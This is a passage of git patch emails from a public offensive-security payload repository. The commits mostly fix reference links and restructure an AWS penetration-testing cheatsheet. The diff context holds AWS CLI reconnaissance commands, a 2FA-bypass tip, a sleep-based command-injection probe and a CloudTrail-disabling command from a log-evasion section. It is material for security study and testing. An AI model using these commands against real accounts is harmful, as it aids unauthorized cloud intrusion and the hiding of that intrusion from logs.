subnet we can access other VPC's + +#### Listing VPC peering connections + +``` +aws ec2 describe-vpc-peering-connections +``` + +#### Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC's) + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +#### Listing routing tables + +``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified VPC ID + +``` +aws ec2 describe-instances --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified subnet + +``` +aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" +``` + ## References * [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/) From 522b55eec5fb6eac2214def36cab029ef55d9a55 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 7 Oct 2022 10:50:59 +0200 Subject: [PATCH 62/69] Update Cloud - AWS Pentest.md --- .../Cloud - AWS Pentest.md | 23 ++++--------------- 1 file changed, 4 insertions(+), 19 deletions(-) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index e4cc372..3d6c84a 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -181,7 +181,9 @@ find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges ``` -* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS’s “public” mode +* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode +* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access + ## AWS Patterns @@ -638,7 +640,7 @@ $ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq ## Security checks -https://github.com/DenizParlak/Zeus +Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) * Identity and Access Management * Avoid the use of the "root" account @@ -688,23 +690,6 @@ https://github.com/DenizParlak/Zeus * Ensure a log metric filter and alarm exist for route table changes * Ensure a log metric filter and alarm exist for VPC changes -# AWSome Pentesting Cheatsheet (By pop3ret) - -* This guide was created to help pentesters learning more about AWS misconfigurations and ways to abuse them. -* It was created with my notes gathered with uncontable hours of study and annotations from various places -* It's assumed that you have the AWS keys (~~This is not difficult to find, just look in developer's github~~) -* Author -> pop3ret - -# General Guidelines and tools - -* [Scout Suite](https://github.com/nccgroup/ScoutSuite) -> Security Healthcheck -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) -> AWS Exploitation Framework -* [SkyArk](https://github.com/cyberark/SkyArk) -> Discover most privileged users within AWS infrastructure -* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) -> AWS SDK for python -* [AWS Consoler](https://github.com/NetSPI/aws_consoler) -> Convert AWS Credentials into a console access - - -# AWS Cheatsheet ## Searching for open buckets From ea86f204720868cd61a13c5b355f12894554f9c1 Mon Sep 17 00:00:00 2001 From: "Fabian S. Varon Valencia" Date: Sat, 8 Oct 2022 22:53:35 -0500 Subject: [PATCH 63/69] Add AMSI Bypass and DPAPI links --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 2f1c197..bcfac09 100644 --- a/README.md +++ b/README.md @@ -40,6 +40,8 @@ You might also like the `Methodology and Resources` folder : - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md) + - [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) + - [Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md) - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md) - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md) From d214af633cc8505a3e90f69a8342b8e1a09f74a9 Mon Sep 17 00:00:00 2001 From: "Fabian S. Varon Valencia" Date: Sat, 8 Oct 2022 22:53:55 -0500 Subject: [PATCH 64/69] remove post exploitation koadic link (not found) --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index bcfac09..4dcd4b0 100644 --- a/README.md +++ b/README.md @@ -45,7 +45,6 @@ You might also like the `Methodology and Resources` folder : - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md) - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md) - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md) - - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md) - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) From 5cdc02282c313639f6d058f71579eb1cc96e0ffc Mon Sep 17 00:00:00 2001 From: "Fabian S. Varon Valencia" Date: Sat, 8 Oct 2022 23:30:31 -0500 Subject: [PATCH 65/69] update 10 password reset flaws URL --- Account Takeover/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 3eebf6b..b580304 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -262,7 +262,7 @@ Enter the code **000000** or **null** to bypass 2FA protection. ## References -- [10 Password Reset Flaws - Anugrah SR](http://anugrahsr.me/posts/10-Password-reset-flaws/) +- [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) - [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be) - [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28) - [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/) From a07468af9bfca3f23216c30e6d1184c0499fd130 Mon Sep 17 00:00:00 2001 From: "Fabian S. Varon Valencia" Date: Sat, 8 Oct 2022 23:31:43 -0500 Subject: [PATCH 66/69] use web archive to retrieve a readable version of this website - currently unavailable --- AWS Amazon Bucket S3/README.md | 2 +- Command Injection/README.md | 2 +- File Inclusion/README.md | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 5abe5f9..75acd63 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -159,7 +159,7 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws ## References * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) -* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) +* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) diff --git a/Command Injection/README.md b/Command Injection/README.md index cd41aec..54aa11b 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -308,7 +308,7 @@ echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep( ## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) -* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) +* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) * [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index f6bfef4..bbcbe86 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -465,9 +465,9 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) +* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) -* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) +* [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) From c82ec3a902ebc4328848dc3a2624384e852dd637 Mon Sep 17 00:00:00 2001 From: "Fabian S. Varon Valencia" Date: Sat, 8 Oct 2022 23:32:31 -0500 Subject: [PATCH 67/69] update URL 0dayallday is not working, same article found in blackmarble.sh --- AWS Amazon Bucket S3/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 75acd63..ba79f25 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -162,7 +162,7 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws * [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) -* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) +* [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/) * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) * [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) * [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf) From 4b4a630085dcfff91540d94ac94cf834e57df3da Mon Sep 17 00:00:00 2001 From: pop3ret <78824745+pop3ret@users.noreply.github.com> Date: Sun, 9 Oct 2022 16:01:14 -0300 Subject: [PATCH 68/69] Changed summary and chapters Changed summary to include the cheatsheet and also changed the format of the cheatsheet to be the same as the original file --- .../Cloud - AWS Pentest.md | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 3d6c84a..e72dabc 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -28,6 +28,7 @@ - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) - [DynamoDB](#dynamodb) - [Security checks](#security-checks) + - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) - [References](#references) ## Training @@ -690,7 +691,7 @@ Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://g * Ensure a log metric filter and alarm exist for route table changes * Ensure a log metric filter and alarm exist for VPC changes - +## AWSome Pentesting Cheatsheet ## Searching for open buckets ``` @@ -713,7 +714,7 @@ arn:aws:iam:100:user/admin 4. Field -> User ID 5. Field -> entity identifier -# IAM +## IAM * It's assumed that we have gain access to the AWS Credentials * We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**) * Always look for policies and roles with the * symbol. @@ -1072,7 +1073,7 @@ export AWS_SESSION_TOKEN aws sts get-caller-identity ``` -# S3 - Simple Storage System +## S3 - Simple Storage System * Storage system that allow users to store and retrieve data. * List,Get,Put and Delete operations can be performed on the objects of the bucket @@ -1147,7 +1148,7 @@ aws s3api get-object --bucket name --key object-name download-file-location aws s3 presign s3://bucket-name/object-name --expires-in 605000 ``` -# Lambda & API Gateway +## Lambda & API Gateway * Serverless event driven platform * Runs code in response to events and automatically manages computing resources required by that code * Can trigger from other AWS services or call directly from the API Gateway @@ -1445,7 +1446,7 @@ aws lambda invoke --function-name name response.json --region region aws iam list-attached-user-policies --user-name user_name ``` -# AWS Secret Manager +## AWS Secret Manager * AWS Service that encrypts and store secrets * Transparently decrypts and return in plaintext @@ -1579,7 +1580,7 @@ aws kms get-key-policy --policy-name name --key-id ID aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext ``` -# Containers +## Containers Divided into three categories @@ -1785,7 +1786,7 @@ docker tag image_name ecr_addr:Image_Name docker push ecr_addr:Image_Name ``` -# EC2 +## EC2 * AMI, images used to create virtual machines * It's possible to create a malicious image to compromise users @@ -2127,7 +2128,7 @@ TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --usernam mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN ``` -# SSO & Other Services +## SSO & Other Services ## Single Sign On (SSO) @@ -2190,7 +2191,7 @@ aws cloudtrail update-trail --name example_trail --no-include-global-service-eve * Threat detection service that monitors for malicious activity and unauthorized behavior * Works by collecting and analyzing logs -# Virtual Private Cloud +## Virtual Private Cloud * Used to create an isolated infrastructure within the cloud, including subnets and so on. * If the VPC has an internet gateway, means its a public subnet From 0530c19c88beef5a4a798d19ac3dea39028aa0f4 Mon Sep 17 00:00:00 2001 From: pop3ret <78824745+pop3ret@users.noreply.github.com> Date: Sun, 9 Oct 2022 16:03:33 -0300 Subject: [PATCH 69/69] Update Cloud - AWS Pentest.md --- Methodology and Resources/Cloud - AWS Pentest.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index e72dabc..480bcce 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -692,6 +692,9 @@ Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://g * Ensure a log metric filter and alarm exist for VPC changes ## AWSome Pentesting Cheatsheet + +* Created by pop3ret + ## Searching for open buckets ``` @@ -775,7 +778,7 @@ aws iam list-attached-user-policies --user-name user-name aws iam list-user-policies --user-name user-name ``` -## 2. Enumeration Groups IAM +## 2. Enumerating Groups IAM ### Listing IAM Groups